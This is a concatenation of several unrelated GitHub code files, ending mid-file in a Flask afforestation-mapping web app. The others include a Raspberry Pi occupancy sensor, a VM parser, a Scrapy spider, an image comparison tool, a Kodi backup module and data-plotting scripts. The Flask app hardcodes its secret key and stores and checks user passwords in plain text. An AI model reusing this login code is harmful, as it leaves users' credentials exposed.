      for line in f:\n            if line[0:6]=='Serial':\n                cpuserial = line[10:26]\n                cpuserial = 'ID' + 
reversestring(cpuserial) # flip the serial number to increase the entropy\n        f.close()\n    except:\n        cpuserial = \"ERROR000000000\"\n\n    return cpuserial\n\n##### DECISION FUNCTIONS #####################################################\n\ndef active(sn): # what to do when movement is detected past the threshold\n    global personPresent\n    update_iot(sn, 1)\n    personPresent = 1\n    LEDr.on()\n\ndef notactive(sn): # what to do when no movement has been detected for the set amount\n    global personPresent\n    update_iot(sn, 0)\n    personPresent = 0\n    LEDr.off()\n\n#### MAIN FUNCTION ############################################################\n\ndef main(debug=1):\n    if debug:\n        print(\"Debug mode\")\n    else:\n        print(\"Production mode\")\n    confidence = startConfidence\n    prevActive = 0\n\n    sn = getserial()\n\n    if debug: ## DEBUG\n        print(\"SERIAL : \" + sn)\n\n    reminderTick = 0\n    active(sn)\n    LEDg.on()\n    time.sleep(2)\n\n    processing = True # in case we need to exit, can just flip to false\n    while processing:\n\n        triggertime = datetime.datetime.now().isoformat() + ' : '\n\n        # ensure we announce a status regularly, even if no status change (to prevent continuous use of a space showing as unused)\n        if reminderTick <= 0:\n            print(triggertime + 'Reminder announce = ' + str(personPresent))\n            if personPresent:\n                active(sn)\n            else:\n                notactive(sn)\n            update_iot(sn, personPresent)\n            reminderTick = reminderAnnounce\n        reminderTick = reminderTick - loopDelay\n\n        currentMovement = PIR.value # update motion sensor value\n\n        percentageConfidence = round((confidence/highThreshold)*100)\n        if debug: ### DEBUG\n            print(triggertime + \"confidence: \"+str(confidence)+\" (\"+str(percentageConfidence)+\"% to active)\")\n\n        if currentMovement == 1: # movement but not active yet\n            LEDg.on()\n            if confidence < (maxConfidence-addValue):\n                confidence += addValue # increase confidence if it's not at max already\n\n            if debug: ### DEBUG\n                print(triggertime + \"movement! 
(confidence += \"+str(addValue)+\")\")\n\n else: # no movement detected\n LEDg.off()\n if confidence > (minConfidence+subValue):\n confidence -= subValue # decrease confidence if it's not at min already\n\n if debug: ### DEBUG\n print(triggertime +\"(confidence -= \"+str(subValue)+\")\")\n\n if confidence >= highThreshold and prevActive == 0: # person\n active(sn)\n prevActive = 1\n\n if debug: ### DEBUG\n print(triggertime + \" PERSON +++++\")\n\n elif confidence <= lowThreshold and prevActive == 1: # no person\n notactive(sn)\n prevActive = 0\n\n if debug: ### DEBUG\n print(triggertime +\"NO PERSON -----\")\n\n sys.stdout.flush()\n time.sleep(loopDelay) # wait a bit for next check\n\ntry:\n if (sys.version_info < (3, 0)):\n print(\"This script relies upon Python 3, nothing less\\n\")\n exit()\n\n pinLEDred = \"BCM26\" # Red LED shows if sensor detects a perso\n pinLEDgreen = \"BCM14\" # Green LED shows if sensor detects motion\n pinSensor = \"BCM4\" # Sensor LED is input from PIR\n\n PIR = MotionSensor(pinSensor) # init a Motion Sensor object on the GPIO you've connected it to\n LEDr = LED(pinLEDred)\n LEDg = LED(pinLEDgreen)\n main(debug=(len(sys.argv) - 1) > 0) # start monitoring - if any parameters then assume debug mode, otherwise it's prod!\n\nexcept Exception as e:\n print(e)\n print(\"IR control script just failed!\")\n","repo_name":"aws-samples/aws-builders-fair-projects","sub_path":"reinvent-2019/iot-hotdesks/bin/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7450,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"48"} +{"seq_id":"36143502902","text":"#!/usr/bin/env python3.8\n\nimport re\nimport os\n\nfrom enum import Enum, unique, auto\n\nclass Parser:\n def __init__(self, vmFileName, codeRightr):\n self.vmFileName = vmFileName\n self.codeRightr = codeRightr\n \n def argu1(self, comm, cType):\n if cType != commType.cArithmetic:\n return comm.split()[1]\n else:\n return comm.split()[0]\n\n def argu2(self, comm):\n return comm.split()[2]\n\n # Return the command type\n def commandType(self, commLine):\n if commLine:\n\n # Create regular expresions for each command type\n rePush = re.compile('^push')\n rePop = re.compile('^pop')\n reLabel = re.compile('^label')\n reGoto = re.compile('^goto')\n reIf = re.compile('^if')\n reFunction = re.compile('^function')\n reReturn = re.compile('^return')\n reCall = re.compile('^call')\n\n # Use the first word in the command to figure out what type it is\n if rePush.match(commLine):\n return commType.cPush\n elif rePop.match(commLine):\n return commType.cPop\n elif reLabel.match(commLine):\n return commType.cLabel\n elif reGoto.match(commLine):\n return commType.cGoto\n elif reIf.match(commLine):\n return commType.cIf\n elif reFunction.match(commLine):\n return commType.cFunction\n elif reReturn.match(commLine):\n return commType.cReturn\n elif reCall.match(commLine):\n return commType.cCall\n # Else it's arithmetic!:\n else:\n return commType.cArithmetic\n\n def parseFile(self):\n if self.vmFileName:\n self.vmStream = open(self.vmFileName, 'r')\n # Get the name of the file, no path, no extension\n vmShortName = [i for i in os.path.splitext(self.vmFileName)[0].split('/') if i][-1]\n print(f'Working on file: {vmShortName}')\n\n for line in self.vmStream:\n commLine = line.split(\"//\")[0].strip() \n if commLine:\n # Make sure it's lower case so we aren't bamboozeled\n commLine = commLine.lower()\n\n # Determine the command type\n cType = self.commandType(commLine)\n\n # Turn the 
command into a list to store in appropriate variables\n                    commList = commLine.split()\n                    # Pad command list with 'None' in case it's too short\n                    comLength = 3\n                    (command, arg1, arg2) = commList[:comLength] + [None]*(comLength-len(commList))\n\n                    if cType == commType.cArithmetic:\n                        # Write out arithmetic command\n                        self.codeRightr.writeArithmetic(command)\n                    elif cType == commType.cPush or cType == commType.cPop:\n                        # Write out push or pop command, pass the vm file name to scope the static variables\n                        self.codeRightr.writePushPop(cType, arg1, arg2, vmShortName)\n                    elif cType == commType.cLabel:\n                        # Call write label and pass arg1, the label name\n                        self.codeRightr.writeLabel(arg1)\n                    elif cType == commType.cGoto:\n                        # Call write goto and pass arg1, the label name\n                        self.codeRightr.writeGoto(arg1)\n                    elif cType == commType.cIf:\n                        # Call write if-goto and pass arg1, the label name\n                        self.codeRightr.writeIf(arg1)\n                    elif cType == commType.cFunction:\n                        # Call write function and pass arg1, the function name, and arg2, the num of func args\n                        self.codeRightr.writeFunction(arg1, arg2)\n                    elif cType == commType.cReturn:\n                        # Call write return\n                        self.codeRightr.writeReturn()\n                    elif cType == commType.cCall:\n                        # Call call function, pass arg1, function name, and arg2, num of function arguments\n                        self.codeRightr.writeCall(arg1, arg2)\n\n            self.close()\n\n    def close(self):\n        self.vmStream.close()\n\n@unique\nclass commType(Enum):\n    cArithmetic = auto()\n    cPush = auto()\n    cPop = auto()\n    cLabel = auto()\n    cGoto = auto()\n    cIf = auto()\n    cFunction = auto()\n    cReturn = auto()\n    cCall = auto()\n","repo_name":"jburnworth/Nand2Tetris","sub_path":"projects/08/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16395102014","text":"import scrapy\nimport asyncio\nasyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\n\n\nclass Book(scrapy.Item):\n    title = scrapy.Field()\n    price = scrapy.Field()\n\nclass BooksSpider(scrapy.Spider):\n    \"\"\"Class for scraping books from https://books.toscrape.com/\"\"\"\n\n    name = \"books\"\n\n    def start_requests(self):\n        url = \"https://books.toscrape.com/\"\n        yield scrapy.Request(\n            url,\n            meta=dict(\n                playwright=True,\n                playwright_include_page=True,\n                errback=self.errback,\n            ),\n        )\n\n    async def parse(self, response):\n        page = response.meta[\"playwright_page\"]\n        await page.close()\n\n        for book in response.css(\"article.product_pod\"):\n            book = Book(\n                title=book.css(\"h3 a::attr(title)\").get(),\n                price=book.css(\"p.price_color::text\").get(),\n            )\n            yield book\n\n    async def errback(self, failure):\n        page = failure.request.meta[\"playwright_page\"]\n        await page.close()\n","repo_name":"AJ07009/Troll_brigde","sub_path":"troll/trollscrape/trollscrape/spiders/bookspider.py","file_name":"bookspider.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22029750715","text":"\"\"\"\n.. module:: payload_recovery_test\n   :synopsis: Functionality of payload comparison is defined here\n.. moduleauthor:: Daniel Hislop\n\"\"\"\n\nimport argparse\nimport numpy as np\nfrom PIL import Image\n\ndef get_arguments():\n    \"\"\"**Command line argument parsing**\n\n    Use of the argparse library to parse user input in the command line application. \n    The original and recovered payload paths are supplied as optional arguments,\n    so either or both can be specified.\n    \n    Returns:\n        Namespace: Parsed user arguments.\n    \"\"\"\n    parser = argparse.ArgumentParser(description=\"Payload Comparison Tool\")\n    parser.add_argument(\"-o\", \"--original\", type=str, help=\"Original Payload\")\n    parser.add_argument(\"-r\", \"--recovered\", nargs=\"?\", type=str, help=\"Recovered Payload\")\n    args = parser.parse_args()\n    return args\n\ndef get_file(name):\n    \"\"\"**Get File**\n\n    Read in image using pillow library and return as numpy array\n\n    Args:\n        name (String): Name of image file\n    Returns:\n        ndarray: Numpy array of image file\n    \"\"\"\n    print(\"Opening %s\" % name)\n    temp = Image.open(\"%s\" % name)\n    return (np.array(temp))\n\ndef compare(args):\n    \"\"\"**Image Comparison**\n\n    Compare two images using numpy. Image 1 and 2 are numpy arrays. Use np.array_equal to\n    compare. If equal then match, otherwise no match.\n\n    Args:\n        args (Namespace): Parsed user arguments containing path to original and path to \n        recovered payloads.\n    \"\"\"\n    original = get_file(args.original)\n    recovered = get_file(args.recovered)\n    if (np.array_equal(original, recovered)):\n        print(\"Recovered matches original\")\n    else:\n        print(\"Recovered does not match original\")\n\ndef main():\n    \"\"\"**Driver Code**\n\n    Parse user arguments and call comparison function\n    \"\"\"\n    args = get_arguments()\n    compare(args)\n\nif __name__ == \"__main__\":\n    main()\n\n","repo_name":"AyCarlito/improved-steganography-project","sub_path":"src/steganography/payload_comparison_tool/payload_recovery_test.py","file_name":"payload_recovery_test.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37650225706","text":"import xbmc\nimport xbmcgui\nimport xbmcvfs\t\nimport xbmcaddon\nimport os\nimport shutil\nimport json\nimport xml.etree.ElementTree as ET \nfrom .addonvar import user_path, data_path, setting, addon_id, packages, addon_name, dialog\n\nuser_path = xbmcvfs.translatePath('special://userdata/')\t\ndata_path = os.path.join(user_path, 'addon_data/')\nskin_path = xbmcvfs.translatePath('special://skin/')\ntext_path = os.path.join(xbmcvfs.translatePath(xbmcaddon.Addon().getAddonInfo('path')), 'resources/', 'texts/')\nskin = ET.parse(os.path.join(skin_path, 'addon.xml'))\nroot = skin.getroot()\nskin_id = root.attrib['id']\ngui_save = os.path.join(user_path, 'gui_settings/')\ngui_file = 'guisettings.xml'\nskinsc = 'script.skinshortcuts'\n\ndef backup(path, file):\n    if os.path.exists(os.path.join(path, file)):\n        try:\n            if os.path.isfile(os.path.join(path, file)):\n                xbmcvfs.copy(os.path.join(path, file), os.path.join(packages, file)) #Backup your Kodi specifics (advancedsettings, favs etc...)\n            elif os.path.isdir(os.path.join(path, file)):\n                shutil.copytree(os.path.join(path, file), os.path.join(packages, file), dirs_exist_ok=True) #Backup your Trakt & Debrid data\n        except Exception as e:\n            xbmc.log('Failed to backup %s. 
Reason: %s' % (os.path.join(gui_save, gui_file), e), xbmc.LOGINFO) \n if os.path.exists(os.path.join(data_path, skin_id)) and os.path.exists(os.path.join(gui_save)):\n try:\n shutil.copytree(os.path.join(data_path, skin_id), os.path.join(gui_save, skin_id), dirs_exist_ok=True) #Backup skin settings\n except Exception as e:\n xbmc.log('Failed to backup %s. Reason: %s' % (os.path.join(gui_save, skin_id), e), xbmc.LOGINFO)\n if os.path.exists(os.path.join(data_path, skinsc)) and os.path.exists(os.path.join(gui_save)):\n try:\n shutil.copytree(os.path.join(data_path, skinsc), os.path.join(gui_save, skinsc), dirs_exist_ok=True) #Backup skinshortcut settings\n except Exception as e:\n xbmc.log('Failed to backup %s. Reason: %s' % (os.path.join(gui_save, skinsc), e), xbmc.LOGINFO) \n \ndef restore(path, file):\n if os.path.exists(os.path.join(packages, file)):\n try:\n if os.path.isfile(os.path.join(packages, file)):\n if os.path.exists(os.path.join(user_path, file)):\n os.unlink(os.path.join(path, file)) #Remove Kodi specifics (advancedsettings, favs etc...) included with new install\n shutil.move(os.path.join(packages, file), os.path.join(path, file)) #Restore your backed up Kodi specifics (advancedsettings, favs etc...)\n elif os.path.isdir(os.path.join(packages, file)):\n shutil.copytree(os.path.join(packages, file), os.path.join(path, file), dirs_exist_ok=True) #Restore your backed up Trakt & Debrid data\n except Exception as e:\n xbmc.log('Failed to restore %s. Reason: %s' % (os.path.join(path, file), e), xbmc.LOGINFO)\n\ndef restore_gui():\n if os.path.exists(os.path.join(gui_save, gui_file)):\n try:\n xbmcvfs.copy(os.path.join(gui_save, gui_file), os.path.join(user_path, gui_file)) #Restore you backed up gui settings\n except Exception as e:\n xbmc.log('Failed to restore %s. Reason: %s' % (os.path.join(user_path, gui_file), e), xbmc.LOGINFO)\n dialog.ok(addon_name, 'To save changes you now need to force close Kodi, Press OK to force close Kodi')\n os._exit(1)\n \ndef restore_skin():\n if os.path.exists(os.path.join(data_path, skin_id)):\n try:\n shutil.copytree(os.path.join(gui_save, skin_id), os.path.join(data_path, skin_id), dirs_exist_ok=True) #Restore your backed up skin settings\n except Exception as e:\n xbmc.log('Failed to restore %s. Reason: %s' % (os.path.join(data_path, skin_id), e), xbmc.LOGINFO)\n if os.path.exists(os.path.join(data_path, skinsc)) and os.path.exists(os.path.join(gui_save, skinsc)):\n try:\n shutil.copytree(os.path.join(gui_save, skinsc), os.path.join(data_path, skinsc), dirs_exist_ok=True) #Restore your backed up skinshortcuts settings\n except Exception as e:\n xbmc.log('Failed to restore %s. 
Reason: %s' % (os.path.join(data_path, skinsc), e), xbmc.LOGINFO)\n    dialog.ok(addon_name, 'To save changes you now need to force close Kodi, Press OK to force close Kodi')\n    os._exit(1)\n\ndef save_backup_restore(_type: str) -> None:\n    with open(os.path.join(text_path, 'backup_restore.json'), 'r', encoding='utf-8', errors='ignore') as f:\n        item_list = json.loads(f.read())\n    for item in item_list.keys():\n        setting_id = item_list[item]['setting']\n        path = item_list[item]['path']\n        data = item + '/settings.xml' #Addon settings\n        realizer = item + '/rdauth.json' #Realizer debrid data\n        youtube = item + '/api_keys.json' #Youtube API Keys\n        if path == 'user_path':\n            path = user_path\n        elif path == 'data_path':\n            path = data_path\n        try:\n            if setting(setting_id)=='true':\n                if _type == 'backup':\n                    backup(path, data) #Backup all addon data\n                    backup(user_path, item) #Backup Kodi specifics\n                    backup(path, realizer) #Backup Realizer data\n                    backup(path, youtube) #Backup Youtube data\n                elif _type == 'restore':\n                    restore(path, item) #Restore all addon data and Kodi specifics\n        except Exception as e:\n            xbmc.log(f'Error= {e}', xbmc.LOGINFO)\n            continue\n","repo_name":"nebulous42069/diggz","sub_path":"nexus/plugin.program.chef20/resources/lib/modules/save_data.py","file_name":"save_data.py","file_ext":"py","file_size_in_byte":6268,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"44410913872","text":"import cv2\n\ncam = cv2.VideoCapture(0)\n\ncv2.namedWindow(\"test\")\n\nwhile True:\n    ret, frame = cam.read()\n    if not ret:\n        break\n    cv2.imshow(\"test\", frame)\n    k = cv2.waitKey(1)\n\n    if k % 256 == 27:\n        # ESC pressed\n        print(\"Escape hit, closing...\")\n        break\n    elif k % 256 == 32:\n        # SPACE pressed\n        name = input(\"Please enter your name: \")\n        cv2.imwrite(name + \".png\", frame)\n        print(\"{} written!\".format(name))\n\ncam.release()\n\ncv2.destroyAllWindows()","repo_name":"dacharat/python-deep-learning","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37542730609","text":"import numpy as np\nimport pandas as pd\nimport os,sys\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport plotly as py\nimport plotly.graph_objs as go\nimport plotly.express as px\nfrom plotly.offline import init_notebook_mode, iplot, plot\n\n# Path to the data files\n# file_path = os.path.dirname(os.path.abspath(__file__))\nfile_path = 'data'\nfile_path1 = 'pic'\n\n# Read in the data\ndf_2015 = pd.read_csv(f'{file_path}/2015.csv')\ndf_2016 = pd.read_csv(f'{file_path}/2016.csv')\ndf_2017 = pd.read_csv(f'{file_path}/2017.csv')\ndf_2018 = pd.read_csv(f'{file_path}/2018.csv')\ndf_2019 = pd.read_csv(f'{file_path}/2019.csv')\n\n# Add a new column - year\ndf_2015[\"year\"] = str(2015)\ndf_2016[\"year\"] = str(2016)\ndf_2017[\"year\"] = str(2017)\ndf_2018[\"year\"] = str(2018)\ndf_2019[\"year\"] = str(2019)\n\n# Merge the data\ndf_all = df_2015.append([df_2016, df_2017, df_2018, df_2019], sort=False)\ndf_all.drop('Unnamed: 0', axis=1, inplace=True)\ndf_all.head()\ndata = dict(type='choropleth',\n            locations=df_2019['region'],\n            locationmode='country names',\n            colorscale='RdYlGn',\n            z=df_2019['happiness'],\n            text=df_2019['region'],\n            colorbar={'title': 'Happiness score'})\n\n# layout = dict(title='World happiness map, 2019',\n#               geo=dict(showframe=True, projection={'type': 'azimuthal equal area'}))\n\n# choromap3 = go.Figure(data=[data], layout=layout)\n# plot(choromap3, filename=f'{file_path}/世界幸福地图.html')\n\n# # 
{"seq_id":"37542730609","text":"import numpy as np\nimport pandas as pd\nimport os,sys\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport plotly as py\nimport plotly.graph_objs as go\nimport plotly.express as px\nfrom plotly.offline import init_notebook_mode, iplot, plot\n\n# data file paths\n# file_path = os.path.dirname(os.path.abspath(__file__))\nfile_path = 'data'\nfile_path1 = 'pic'\n\n# read in the data\ndf_2015 = pd.read_csv(f'{file_path}/2015.csv')\ndf_2016 = pd.read_csv(f'{file_path}/2016.csv')\ndf_2017 = pd.read_csv(f'{file_path}/2017.csv')\ndf_2018 = pd.read_csv(f'{file_path}/2018.csv')\ndf_2019 = pd.read_csv(f'{file_path}/2019.csv')\n\n# add a new column - year\ndf_2015[\"year\"] = str(2015)\ndf_2016[\"year\"] = str(2016)\ndf_2017[\"year\"] = str(2017)\ndf_2018[\"year\"] = str(2018)\ndf_2019[\"year\"] = str(2019)\n\n# merge the data\ndf_all = df_2015.append([df_2016, df_2017, df_2018, df_2019], sort=False)\ndf_all.drop('Unnamed: 0', axis=1, inplace=True)\ndf_all.head()\ndata = dict(type='choropleth',\n            locations=df_2019['region'],\n            locationmode='country names',\n            colorscale='RdYlGn',\n            z=df_2019['happiness'],\n            text=df_2019['region'],\n            colorbar={'title': '幸福指数'})\n\n# layout = dict(title='2019年世界幸福指数地图',\n#               geo=dict(showframe=True, projection={'type': 'azimuthal equal area'}))\n\n# choromap3 = go.Figure(data=[data], layout=layout)\n# plot(choromap3, filename=f'{file_path}/世界幸福地图.html')\n\n# # merge the data\n# rank_top10 = df_2019.head(10)[['rank', 'region', 'happiness']]\n# last_top10 = df_2019.tail(10)[['rank', 'region', 'happiness']]\n# rank_concat = pd.concat([rank_top10, last_top10])\n\n# # bar chart\n# fig = px.bar(rank_concat,\n#              x=\"region\",\n#              y=\"happiness\",\n#              color=\"region\",\n#              title=\"2019年全球最幸福和最不幸福的国家\")\n\n# plot(fig, filename=f'{file_path}/2019世界幸福国家排行Top10和Last10.html')\n\n# heatmap\n# plt.figure(figsize=(25, 20))\n# sns.heatmap(df_all.corr(), cmap='rainbow', linewidths=0.1, annot=True)\n# plt.title('数值变量之间的相关性', fontsize=18)\n# plt.xticks(fontsize=13)\n# plt.yticks(fontsize=13)\n# plt.show()\n\n# # scatter plot\n# fig = px.scatter(df_all, x='gdp_per_capita',\n#                  y='happiness',\n#                  facet_row='year',\n#                  color='year',\n#                  # trendline='ols'\n#                  )\n# fig.update_layout(height=800, title_text='人均GDP和幸福指数')\n# plot(fig, filename=f'{file_path1}/GDP和幸福得分.html')\n\n# # scatter plot\nfig = px.scatter(df_all, x='healthy_life_expectancy',\n                 y='happiness',\n                 facet_row='year',\n                 color='year',\n                 # trendline='ols'\n                 )\nfig.update_layout(\n    height=800, title_text='健康预期寿命和幸福指数')\nplot(fig, filename=f'{file_path1}/健康预期寿命和幸福得分.html')\n\n# # scatter plot\n# fig = px.scatter(df_all, x='freedom_to_life_choise',\n#                  y='happiness',\n#                  facet_row='year',\n#                  color='year',\n#                  trendline='ols'\n#                  )\n# fig.update_layout(\n#     height=800, title_text='自由权和幸福指数')\n# plot(fig, filename=f'{file_path}/自由权和幸福得分.html')\n\n# # scatter plot\n# fig = px.scatter(df_all, x='corruption_perceptions',\n#                  y='happiness',\n#                  facet_row='year',\n#                  color='year',\n#                  trendline='ols'\n#                  )\n# fig.update_layout(\n#     height=800, title_text='清廉指数和幸福指数')\n# plot(fig, filename=f'{file_path}/清廉指数和幸福得分.html')\n\n# # scatter plot\n# fig = px.scatter(df_all, x='generosity',\n#                  y='happiness',\n#                  facet_row='year',\n#                  color='year',\n#                  trendline='ols'\n#                  )\n# fig.update_layout(\n#     height=800, title_text='慷慨程度和幸福指数')\n# plot(fig, filename=f'{file_path}/慷慨程度和幸福得分.html')\n\n# # scatter plot\n# fig = px.scatter(df_all, x='social_support',\n#                  y='happiness',\n#                  facet_row='year',\n#                  color='year',\n#                  trendline='ols'\n#                  )\n# fig.update_layout(\n#     height=800, title_text='社会援助和幸福指数')\n# plot(fig, filename=f'{file_path}/社会援助和幸福得分.html')\n\n# animated chart\n# fig = px.scatter(df_all,\n#                  x='gdp_per_capita',\n#                  y='happiness',\n#                  animation_frame='year',\n#                  animation_group='region',\n#                  size='rank',\n#                  color='region',\n#                  hover_name='region',\n#                  trendline='ols'\n#                  )\n# fig.update_layout(title_text='幸福指数vs人均GDP')\n# plot(fig, filename=f'{file_path1}/GDP和幸福水平动态图展示.html')\n#\n# fig = px.scatter(df_all,\n#                  x='healthy_life_expectancy',\n#                  y='happiness',\n#                  animation_frame='year',\n#                  animation_group='region',\n#                  size='rank',\n#                  color='region',\n#                  hover_name='region',\n#                  trendline='ols'\n#                  )\n# fig.update_layout(title_text='幸福排名vs健康预期寿命')\n# plot(fig, filename=f'{file_path1}/健康预期寿命和幸福水平动态图展示.html')\n","repo_name":"cycle13/demo","sub_path":"common_learn/国家幸福指数分析/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
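The demo.py record above stamps each yearly CSV with a year column before stacking the frames; the DataFrame.append it uses is deprecated in current pandas, and pd.concat gives the same result. A small sketch with made-up rows standing in for the CSV files:

```python
import pandas as pd

frames = []
for year in range(2015, 2020):
    # stand-in for pd.read_csv(f"data/{year}.csv")
    df = pd.DataFrame({"region": ["A", "B"], "happiness": [7.0, 6.5]})
    df["year"] = str(year)
    frames.append(df)

# pd.concat replaces the deprecated df.append([...], sort=False) pattern
df_all = pd.concat(frames, ignore_index=True, sort=False)
print(df_all.groupby("year")["happiness"].mean())
```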
{"seq_id":"8876089184","text":"# import colorama\nimport sqlite3\n\nimport jinja2\nimport plotly.utils\nfrom flask_wtf import FlaskForm\nfrom numpy import unicode\nfrom wtforms import (StringField, SubmitField, DateTimeField, DateField, BooleanField, TextAreaField, SelectField)\nfrom flask import Flask, render_template, url_for, request, session, redirect, flash\nfrom wtforms.validators import DataRequired\nimport folium\nimport pandas as pd\nfrom folium.plugins import MeasureControl, MousePosition\nimport plotly.express as plt\nimport json\nfrom datetime import datetime, date\nimport time\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager, UserMixin, login_required, login_user, logout_user, current_user, login_manager\nfrom plotly import io\nimport os\nimport re\n# import seaborn as sns\n# import dash\n# import matplotlib.pyplot as plt\n# df_suburbs = pd.read_excel(\"C:\\waterwatch_clean2.xlsx\", sheet_name='Sheet1')\n# db_data = pd.read_csv(\"C:\\\\Users\\Public\\data.csv\", delimiter=',')\n# db_data_json = pd.read_json(\"C:\\\\Users\\Public\\csvjson.json\")\ndb_data_parse = json.load(open(\"modifiedjson.json\"))\ndb_data_json_new = pd.read_json(\"modifiedjson.json\")\nmeasure_control = MeasureControl()\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n# print(db_data_json.head().to_json())\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'mysecretkey'\n\n\n# Code Login Form: https://github.com/sathyainfotech/Login-Registration-SQLite.git\ncon = sqlite3.connect(\"mydb.db\")\ncon.execute(\"CREATE TABLE if not exists volunteer(id INTEGER PRIMARY KEY, afforestation INTEGER, name TEXT, email TEXT)\")\ncon.execute(\"CREATE TABLE if not exists login(id INTEGER PRIMARY KEY, email TEXT, password TEXT, organisation TEXT)\")\ncon.execute(\"CREATE TABLE if not exists afforestation(id INTEGER PRIMARY KEY, coordinates BLOB, points BLOB, \"\n            \"startDate DATE not null, endDate DATE not null, organisation TEXT not null)\")\ncon.close()\n\n\n@app.route('/loginform')\ndef loginform():\n    return render_template(\"loginform.html\")\n\n\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n    if request.method == 'POST':\n        email = request.form['email']\n        password = request.form['password']\n        con = sqlite3.connect(\"mydb.db\")\n        con.row_factory = sqlite3.Row\n        cur = con.cursor()\n        cur.execute(\"select * from login where email=? 
and password = ?\", (email, password))\n data = cur.fetchone()\n\n if data:\n session[\"email\"] = data[\"email\"]\n session[\"password\"] = data[\"password\"]\n return redirect(\"user\")\n else:\n flash(\"Email and Password incorrect\", \"danger\")\n return redirect(url_for(\"loginform\"))\n\n\n@app.route('/register', methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == 'POST':\n try:\n organisation = request.form['organisation']\n email = request.form['email']\n password = request.form['password']\n con = sqlite3.connect(\"mydb.db\")\n cur = con.cursor()\n cur.execute(\"INSERT INTO login(organisation, email, password) values(?, ?, ?)\", (organisation, email, password))\n con.commit()\n flash(\"Registration completed\", \"success\")\n except:\n flash(\"Registration unsuccessful\", \"danger\")\n finally:\n return redirect(url_for(\"fn\"))\n con.close()\n return render_template(\"register.html\")\n\n\n@app.route('/logout')\ndef logout():\n session.clear()\n filepath = \"specific.json\"\n if os.path.exists(filepath):\n os.remove(filepath)\n else:\n pass\n return redirect(url_for(\"login\"))\n\n\n@app.route('/user', methods=[\"GET\", \"POST\"])\ndef user():\n return render_template(\"user.html\")\n\n\nclass AfforestationForm(FlaskForm):\n # location = json.loads(open(\"bounds.json\"))\n coordinates = StringField()\n startDate = DateField()\n endDate = DateField()\n organisation = StringField()\n submit = SubmitField('Submit')\n\n\nclass JoinForm(FlaskForm):\n afforestation = StringField()\n name = StringField()\n email = StringField()\n submit = SubmitField('Submit')\n\n\n# here was afforestation form\n@app.route('/thankyou')\ndef thankyou():\n return render_template('thankyou.html')\n\n\n@app.route('/home')\ndef fn():\n vis = dataVis()\n treeTypeMap()\n map = treeTypeMap()\n return render_template(\"index.html\", map=map, visualisation=vis)\n\n\n@app.route('/contextinformation')\ndef fn1():\n visHealth = dataVisHealth()\n # mapHealth = treeHealth()\n treeTypeMap()\n map = treeTypeMap()\n return render_template(\"contextInfo.html\", map=map, visualisation=visHealth)\n\n# @app.route('/soiltypeservice')\n# def fn2():\n# visSoil = dataVisSoil()\n# # mapSoil = soilType()\n# map = treeTypeMap()\n# return render_template(\"soilType.html\", map=map, visualisation=visSoil)\n\n\n@app.route('/statusafforestation')\ndef fn3():\n map = treeTypeMap()\n treeTypeMap()\n return render_template(\"statusAfforestation.html\", map=map)\n\n\nglobal poly_ID_selected\nglobal poly_ID_selected_context\n\n\n@app.route('/statusSpecific/')\ndef fn4(poly_id):\n map = treeTypeMap()\n treeTypeMap()\n global poly_ID_selected\n poly_ID_selected = poly_id\n return render_template(\"statusSpecific.html\", map=map, id=poly_id)\n\n\n@app.route('/contextSpecific/')\ndef fn5(poly_id):\n map = treeTypeMap()\n treeTypeMap()\n global poly_ID_selected_context\n poly_ID_selected_context = poly_id\n return render_template(\"contextSpecific.html\", map=map, id=poly_id)\n\n# @app.route('/vegetationSpecific')\n# def specData():\n# specVis = specificDV()\n# map = treeTypeMap()\n# return render_template(\"specificData.html\", map=map, visualisation=specVis)\n#\n# @app.route('/healthSpecific')\n# def specDataHealthTrees():\n# specVis = specificDVhealth()\n# # map = treeHealth()\n# map = treeTypeMap()\n# return render_template(\"specificDatahealth.html\", map=map, visualisation=specVis)\n#\n# @app.route('/soilSpecific')\n# def specDataSoilType():\n# specVis = specificDVsoil()\n# # map = soilType()\n# map = treeTypeMap()\n# 
return render_template(\"specificDataSoil.html\", map=map, visualisation=specVis)\n\nlorem = \"Pythom\"\nmap_osm = folium.Map(location=[35.000, 33.000], zoom_start=9.5)\n# map_osm = Map(mapobj=folium.Map(location=[35.000, 33.000], zoom_start=8), measure_control=MeasureControl(), data_source=db_data_json_new)\nmap_health = folium.Map(location=[35.000, 33.000], zoom_start=8)\nmap_soil = folium.Map(location=[35.000, 33.000], zoom_start=8)\nmap_osm.add_child(MeasureControl())\nmap_health.add_child(measure_control)\nmap_soil.add_child(MeasureControl())\nel = folium.MacroElement().add_to(map_osm)\nel._template = jinja2.Template(\"\"\"\n {% macro script(this, kwargs) %}\n var map_osm = \"\"\"+map_osm.get_name()+\"\"\";\n \"\"\"+map_osm.get_name()+\"\"\".on('measurefinish', function(evt){\n fetch(\"/measureFinish\", {\n method: \"post\",\n headers: {\n \"Accept\": \"app/json\",\n \"Content-Type\": \"app/json\"\n },\n body: JSON.stringify({\n oJS_In: evt\n }, getCircularReplacer())\n });\n });\n\n const getCircularReplacer = () => {\n const seen = new WeakSet()\n return (key, value) => {\n if (typeof value === \"object\" && value !== null) 